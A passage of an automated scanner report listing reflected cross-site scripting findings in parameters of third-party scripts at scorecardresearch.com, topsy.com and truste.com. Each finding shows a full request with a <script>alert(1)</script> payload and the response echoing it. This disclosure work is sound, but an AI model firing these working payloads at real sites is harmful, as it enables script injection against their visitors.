Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_G=method->-1,ts->1305206896; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf55d4<script>alert(1)</script>861c9a51b7f("");

2.77. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 1aacd<script>alert(1)</script>2221065b157 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=21aacd<script>alert(1)</script>2221065b157&c2=6035094&c3=&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"21aacd<script>alert(1)</script>2221065b157", c2:"6035094", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.78. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 33ba2<script>alert(1)</script>13cb4f86f11 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmashable.com%2F&c5=&c6=&c10=33ba2<script>alert(1)</script>13cb4f86f11&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:30:17 GMT
Date: Thu, 12 May 2011 13:30:17 GMT
Connection: close
Content-Length: 1255

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://mashable.com/", c5:"", c6:"", c10:"33ba2<script>alert(1)</script>13cb4f86f11", c15:"", c16:"", r:""});



2.79. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 92915<script>alert(1)</script>efbb621c20e was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=&c6=&c15=92915<script>alert(1)</script>efbb621c20e&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:56 GMT
Date: Thu, 12 May 2011 13:27:56 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"92915<script>alert(1)</script>efbb621c20e", c16:"", r:""});



2.80. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 9dde8<script>alert(1)</script>7b980e7bea was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=60350949dde8<script>alert(1)</script>7b980e7bea&c3=&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"60350949dde8<script>alert(1)</script>7b980e7bea", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.81. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload e4e1a<script>alert(1)</script>5bede08ec18 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=e4e1a<script>alert(1)</script>5bede08ec18&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"e4e1a<script>alert(1)</script>5bede08ec18", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.82. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ff61b<script>alert(1)</script>190415549b6 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=ff61b<script>alert(1)</script>190415549b6&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"ff61b<script>alert(1)</script>190415549b6", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.83. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 96ad7<script>alert(1)</script>4047793bf11 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=96ad7<script>alert(1)</script>4047793bf11&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"96ad7<script>alert(1)</script>4047793bf11", c6:"", c10:"", c15:"", c16:"", r:""});



2.84. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 1ce64<script>alert(1)</script>e9a688821fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=&c6=1ce64<script>alert(1)</script>e9a688821fa&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"", c6:"1ce64<script>alert(1)</script>e9a688821fa", c10:"", c15:"", c16:"", r:""});



2.85. http://button.topsy.com/widget/retweet-json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 538ee<script>alert(1)</script>75c4880b403 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id1-3-1-7-1-1-20-3-1&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&callback=topsyWidgetCallback538ee<script>alert(1)</script>75c4880b403 HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 12 May 2011 13:33:04 GMT
Last-Modified: Thu, 12 May 2011 13:32:59 GMT
Server: lighttpd/1.4.26
Content-Length: 436
Date: Thu, 12 May 2011 13:32:59 GMT
X-Varnish: 1053771630
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: ps166
X-Cache: MISS

topsyWidgetCallback538ee<script>alert(1)</script>75c4880b403({ "html_id": "topsy_id1-3-1-7-1-1-20-3-1", "url": "http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/", "count": "0", "badge": "", "trackback_url": "http://tops
...[SNIP]...

2.86. http://button.topsy.com/widget/retweet-json [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 1dcf9<script>alert(1)</script>6a054643f01 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id1-3-1-7-1-1-20-3-11dcf9<script>alert(1)</script>6a054643f01&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&callback=topsyWidgetCallback HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 12 May 2011 13:32:56 GMT
Last-Modified: Thu, 12 May 2011 13:32:51 GMT
Server: lighttpd/1.4.26
Content-Length: 436
Date: Thu, 12 May 2011 13:32:51 GMT
X-Varnish: 1053761882
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: ps166
X-Cache: MISS

topsyWidgetCallback({ "html_id": "topsy_id1-3-1-7-1-1-20-3-11dcf9<script>alert(1)</script>6a054643f01", "url": "http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/", "count": "0", "badge": "", "trackback_url": "http://topsy.com/www.gizmodo.com.au/2011/05/google-c
...[SNIP]...

2.87. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 68458<script>alert(1)</script>6f4e5e61299 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont168458<script>alert(1)</script>6f4e5e61299&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4472

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont168458<script>alert(1)</script>6f4e5e61299_ib = '<div id="te-clr1-att02cont168458<script>
...[SNIP]...

2.88. http://choices.truste.com/ca [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 41838<script>alert(1)</script>e9abb0011f3 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=25041838<script>alert(1)</script>e9abb0011f3&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':25041838<script>alert(1)</script>e9abb0011f3,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1'
...[SNIP]...

2.89. http://choices.truste.com/ca [iplc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload e9290<script>alert(1)</script>e98193a566a was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctre9290<script>alert(1)</script>e98193a566a HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctre9290<script>alert(1)</script>e98193a566a','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://choices.trust
...[SNIP]...

2.90. http://choices.truste.com/ca [ox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 1e2fc<script>alert(1)</script>485c4866fa1 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=201e2fc<script>alert(1)</script>485c4866fa1&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
